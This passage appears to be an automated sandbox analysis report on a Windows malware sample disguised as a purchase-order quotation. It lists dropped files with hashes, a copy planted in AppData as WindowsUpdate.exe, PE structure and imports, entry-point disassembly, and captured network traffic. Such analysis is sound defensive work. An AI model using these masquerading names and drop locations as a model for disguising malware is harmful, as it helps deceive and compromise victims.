                                                SHA1:BD9A0C9A7E2125EC668643A67C1DE5AB7053BEE9
                                                SHA-256:EBE9C543D0C54888E69F73621631DF24BCF7996158CC4F69805CB448B11CF2EF
                                                SHA-512:3BCC218C23C2DC2E44752FA14AC1FA69DB851ABD518D3A3D0AE43FFB3B4563C39273E7FC4C473ECB3DC85CA505A18F61F7489744E541C6AE8D513ECF9BB6F5C0
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="824118" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD288.tmp.mdmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Jan 19 22:08:25 2021, 0x60521 type
                                                Category:dropped
                                                Size (bytes):6933739
                                                Entropy (8bit):4.734653460543801
                                                Encrypted:false
                                                SSDEEP:98304:QaMVHrkZq8y7Lb1XaMynrEh+9Hqt+G/haJIy0c83ruYGvkKPTIs:fMVQZN8EnrEh+9HxIqRkKUs
                                                MD5:0FFA20CF1EEC67FD898D3AC64D6C7231
                                                SHA1:8C3CF535A2A1CB827A54C03E639186B21075957A
                                                SHA-256:1646FD0EA566759E195DE0B910D4C301D02FD7D8B9BDE02629FA575AA885DD11
                                                SHA-512:95EE59C890A3C14B7A3DE35A984495ACEB0D859BB7F63BF5860D9CD5382A3BE7787056C79BBA6D2DDF29B77E559248C36006829E4FEBEDB46ABFEE45B64F7551
                                                Malicious:false
                                                Reputation:low
                                                Preview: MDMP....... .......YX.`!..................U...........B.......7......GenuineIntelW...........T.......d...JX.`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0D1.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8524
                                                Entropy (8bit):3.7080535077803924
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNihCRl656YShSUvThRgmfVTSTCprs89bPnosftFm:RrlsNio656YUSUvThRgmfBSCPnbfu
                                                MD5:9FB20031D8273F271E0B02DC2888B81C
                                                SHA1:6C03A55C542379A201F850452865CD8F567A0890
                                                SHA-256:5B1B04CE45984D2003633B3BFD590A9331B4A5AC320A5503CD7CCA1AFFDE54F6
                                                SHA-512:4994B1FA03EDAB8B6DA865A1BB741A6E8868542289F737210B4797FC188CFE1D0BEC636E20296971C3526760BDB864350D35DD2047F15E360F1FB066B891596D
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.4.8.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1CC.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4777
                                                Entropy (8bit):4.5195633541037825
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zspJgtWI99NeyWSC8BB8fm8M4JwO5mEZFJV+q8GqUlpyzpz4Ed:uITf7aQTSNkJwktVJlpMBVd
                                                MD5:8EDDFB7B4C01B2217653133720FB0C3E
                                                SHA1:EE64A9AD9FA38CD71213C86424622FFAC7D57030
                                                SHA-256:684425CEB1CC7C1C95D447C778B60281477DD85DC2083EA402C13C61E74498B2
                                                SHA-512:40C7AA1A2B7B031FE823E3D4619D87F05A7B7B96981B46716DC113A194668A1B1212500D6C1FB5E087DAFBC0800517A53E017FF0B6BDD3BCF014A57F89A7E531
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="824119" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WindowsUpdate.exe.log
                                                Process:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):916
                                                Entropy (8bit):5.282390836641403
                                                Encrypted:false
                                                SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                Malicious:true
                                                Reputation:moderate, very likely benign file
                                                Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview: ..
                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1074688
                                                Entropy (8bit):7.570804768501044
                                                Encrypted:false
                                                SSDEEP:12288:f8WvAMYGY5RFNBeU7vgTOzcdCeddAAU8f9MkdPUBphp5wvvXLlweomEL+wif7APY:f8W4T17vgKzYXAm+DfuTXomAuzABdpu
                                                MD5:EB59D99961C7636B4872E389DA03CBC9
                                                SHA1:22D5FB0F076A0D945596B7938E72B6B5CAE73674
                                                SHA-256:4DD89AEA31CFB64C8FA6B542C9AD002E4041EF5249F2072947DF749E00E7FD9E
                                                SHA-512:6D062B65284DF0F4CE5845B8730AC6ADF46759AF5F35E3BDE86A609BCE9FF0D5846FBE2D30864E411B695D774B6F6903D558E42F067C44817E3421CD5D41B256
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 37%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|..|..|.....v............n..._#......o....a.....n.....m..|.......}.....}....}..Rich|..........PE..L...d..`..........................................@..........................`............@..................................F.......... ....................0..<,...6..............................06..@...............`............................text...:........................... ..`.rdata..............................@..@.data...4....`.......B..............@....gfids..t............N..............@..@.rsrc... ............P..............@..@.reloc..<,...0......................@..B................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview: [ZoneTransfer]....ZoneId=0
                                                C:\Users\user\AppData\Roaming\pid.txt
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):2.0
                                                Encrypted:false
                                                SSDEEP:3:Q:Q
                                                MD5:E21E4E58AD9AB56E8A4634046DA90113
                                                SHA1:D7C1F0DD609C0024D00C7EB35743BCC476459876
                                                SHA-256:2C6499976963E9832529BC8D9DFF516D16C13D372D852D1500F5892E46A25507
                                                SHA-512:0A18737EFF8DEE2E701D7F75B10A56E5610AC75D379E0D4D5528ADADE8D7367618FAFDFEB9F16B66C36DAF4A152D96DCFE9E0B5B47A4CEBB6FDAD6A19FDB9134
                                                Malicious:false
                                                Preview: 2148
                                                C:\Users\user\AppData\Roaming\pidloc.txt
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.792723397330207
                                                Encrypted:false
                                                SSDEEP:3:oNWXp5v1qOL/kiRMQFLTzxl0C:oNWXpFgOLHXLvxl0C
                                                MD5:C2645D3F71F5EA8326BA0B900632630D
                                                SHA1:0456DB88ECD2D46E89CDCFD159029FA44E10B928
                                                SHA-256:92283FB25F70604C5445F52AD17CFC2E7F206C63D5F737B8A81F12F1FC73BB19
                                                SHA-512:0DBE031016D3A882000116A853F4D8FC463AF466948781AE816349878577B4C67ADE9AA0F96D2B0C7E513C3D8536E0D46CD63B417F802E7E01CA064426823881
                                                Malicious:false
                                                Preview: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.570804768501044
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File size:1074688
                                                MD5:eb59d99961c7636b4872e389da03cbc9
                                                SHA1:22d5fb0f076a0d945596b7938e72b6b5cae73674
                                                SHA256:4dd89aea31cfb64c8fa6b542c9ad002e4041ef5249f2072947df749e00e7fd9e
                                                SHA512:6d062b65284df0f4ce5845b8730ac6adf46759af5f35e3bde86a609bce9ff0d5846fbe2d30864e411b695d774b6f6903d558e42f067c44817e3421cd5d41b256
                                                SSDEEP:12288:f8WvAMYGY5RFNBeU7vgTOzcdCeddAAU8f9MkdPUBphp5wvvXLlweomEL+wif7APY:f8W4T17vgKzYXAm+DfuTXomAuzABdpu
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|...|...|.......v...............n...._#.........o.......a.......n.......m...|...........}.......}.......}...Rich|..........

                                                File Icon

                                                Icon Hash:6eecccccd6d2f2f2

                                                Static PE Info

                                                General

                                                Entrypoint:0x401308
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x6005EF64 [Mon Jan 18 20:28:20 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:3f85ebb67bac58f72de974a91d40889a

                                                Entrypoint Preview

                                                Instruction
                                                call 00007FA3F8CD8798h
                                                jmp 00007FA3F8CD8255h
                                                push 00000014h
                                                push 00453B58h
                                                call 00007FA3F8CD8AE7h
                                                push 00000001h
                                                call 00007FA3F8CD8560h
                                                pop ecx
                                                test al, al
                                                jne 00007FA3F8CD8259h
                                                push 00000007h
                                                call 00007FA3F8CD8887h
                                                xor bl, bl
                                                mov byte ptr [ebp-19h], bl
                                                and dword ptr [ebp-04h], 00000000h
                                                call 00007FA3F8CD8449h
                                                mov byte ptr [ebp-24h], al
                                                mov eax, dword ptr [00456A80h]
                                                xor ecx, ecx
                                                inc ecx
                                                cmp eax, ecx
                                                je 00007FA3F8CD822Eh
                                                test eax, eax
                                                jne 00007FA3F8CD829Bh
                                                mov dword ptr [00456A80h], ecx
                                                push 0044B290h
                                                push 0044B270h
                                                call 00007FA3F8CF96BFh
                                                pop ecx
                                                pop ecx
                                                test eax, eax
                                                je 00007FA3F8CD8263h
                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                mov eax, 000000FFh
                                                jmp 00007FA3F8CD834Bh
                                                push 0044B26Ch
                                                push 0044B264h
                                                call 00007FA3F8CF963Dh
                                                pop ecx
                                                pop ecx
                                                mov dword ptr [00456A80h], 00000002h
                                                jmp 00007FA3F8CD8257h
                                                mov bl, cl
                                                mov byte ptr [ebp-19h], bl
                                                push dword ptr [ebp-24h]
                                                call 00007FA3F8CD8637h
                                                pop ecx
                                                call 00007FA3F8CD87FEh
                                                mov esi, eax
                                                xor edi, edi
                                                cmp dword ptr [esi], edi
                                                je 00007FA3F8CD826Ch
                                                push esi
                                                call 00007FA3F8CD8599h
                                                pop ecx
                                                test al, al
                                                je 00007FA3F8CD8261h
                                                push edi
                                                push 00000002h
                                                push edi
                                                mov esi, dword ptr [esi]
                                                mov ecx, esi
                                                call 00007FA3F8CD8A27h
                                                call esi

                                                Data Directories

                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x546dc | 0xb4 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x19f20 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73000 | 0x2c3c | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x53610 | 0x1c | .rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x53630 | 0x40 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x4b000 | 0x260 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x4993a | 0x49a00 | False | 0.472009629669 | data | 6.6152740435 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x4b000 | 0xa3aa | 0xa400 | False | 0.45107660061 | SysEx File - Mesosha | 5.23997613425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0x56000 | 0x1f34 | 0xc00 | False | 0.171549479167 | DOS executable (block device driver \277DN) | 2.22955442271 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .gfids | 0x58000 | 0x174 | 0x200 | False | 0.341796875 | data | 2.11448669888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x59000 | 0x19f20 | 0x1a000 | False | 0.195575420673 | data | 4.62816449784 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc | 0x73000 | 0x2c3c | 0x2e00 | False | 0.783882472826 | data | 6.63145431335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                Name | RVA | Size | Type | Language | Country
                                                RT_ICON | 0x591c0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                                                RT_ICON | 0x5b768 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                                                RT_ICON | 0x5c810 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                RT_ICON | 0x5cc78 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
                                                RT_ICON | 0x60ea0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
                                                RT_RCDATA | 0x71718 | 0x1805 | data | English | United States
                                                RT_GROUP_ICON | 0x716c8 | 0x4c | data | English | United States

                                                Imports

                                                DLL | Import
                                                KERNEL32.dll | Heap32Next, LoadResource, FreeLibrary, GetLongPathNameA, CancelIo, BuildCommDCBAndTimeoutsA, ExitThread, GlobalFindAtomW, GetStdHandle, HeapAlloc, GetProcessHeap, SetConsoleCursorPosition, DecodePointer, EncodePointer, SetEndOfFile, WriteConsoleW, HeapReAlloc, HeapSize, GetTimeZoneInformation, SetConsoleMode, ReadConsoleInputW, ReadConsoleInputA, PeekConsoleInputA, GetNumberOfConsoleInputEvents, CreateFileW, SetConsoleCtrlHandler, GetStringTypeW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, MoveFileExW, GetFileAttributesExW, CreateProcessW, CreateProcessA, GetExitCodeProcess, WaitForSingleObject, GetCurrentThread, DeleteFileW, CloseHandle, GetConsoleCP, FlushFileBuffers, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, InterlockedPushEntrySList, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, ReadFile, QueryPerformanceFrequency, MultiByteToWideChar, WriteFile, GetModuleFileNameW, GetModuleFileNameA, WideCharToMultiByte, GetACP, HeapFree, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetFileType, OutputDebugStringA, OutputDebugStringW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, RaiseException
                                                SHELL32.dll | DragQueryFile, Shell_NotifyIconA
                                                MSWSOCK.dll | EnumProtocolsA, GetNameByTypeW, GetServiceA, getnetbyname
                                                mscms.dll | EnumColorProfilesW, UnregisterCMMA, CreateProfileFromLogColorSpaceW, GetPS2ColorRenderingIntent, EnumColorProfilesA
                                                msi.dll |
                                                WS2_32.dll | gethostbyaddr, WSCInstallNameSpace, WSALookupServiceNextA, WSARemoveServiceClass
                                                ODBC32.dll | VRetrieveDriverErrorsRowCol
                                                USER32.dll | GetDC, GrayStringW

                                                Possible Origin

                                                Language of compilation system | Country where language is spoken
                                                English | United States

                                                Network Behavior

                                                Snort IDS Alerts

                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                01/19/21-14:07:24.893873 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49709 | 104.16.155.36 | 192.168.2.3

                                                Network Port Distribution

                                                TCP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jan 19, 2021 14:07:24.803280115 CET | 49709 | 80 | 192.168.2.3 | 104.16.155.36
                                                Jan 19, 2021 14:07:24.843286991 CET | 80 | 49709 | 104.16.155.36 | 192.168.2.3
                                                Jan 19, 2021 14:07:24.843444109 CET | 49709 | 80 | 192.168.2.3 | 104.16.155.36
                                                Jan 19, 2021 14:07:24.844419956 CET | 49709 | 80 | 192.168.2.3 | 104.16.155.36
                                                Jan 19, 2021 14:07:24.884332895 CET | 80 | 49709 | 104.16.155.36 | 192.168.2.3
                                                Jan 19, 2021 14:07:24.893872976 CET | 80 | 49709 | 104.16.155.36 | 192.168.2.3
                                                Jan 19, 2021 14:07:24.944005013 CET | 49709 | 80 | 192.168.2.3 | 104.16.155.36
                                                Jan 19, 2021 14:08:07.401418924 CET | 49709 | 80 | 192.168.2.3 | 104.16.155.36

                                                UDP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jan 19, 2021 14:07:24.737133026 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:24.784964085 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:27.024379015 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:27.080846071 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:29.446954966 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:29.503288984 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:38.352360964 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:38.406651974 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:38.416496992 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:38.465986013 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:41.692348957 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:41.777007103 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:46.849670887 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:46.898314953 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:53.292752028 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:07:53.342840910 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:07:59.963716030 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:00.014316082 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:02.032809973 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:02.093347073 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:04.101022005 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:04.151834011 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:11.430254936 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:11.486526012 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:11.658313990 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:11.719221115 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:12.349411964 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:12.397241116 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:13.509324074 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:13.557267904 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:19.087261915 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:19.135039091 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:20.055285931 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
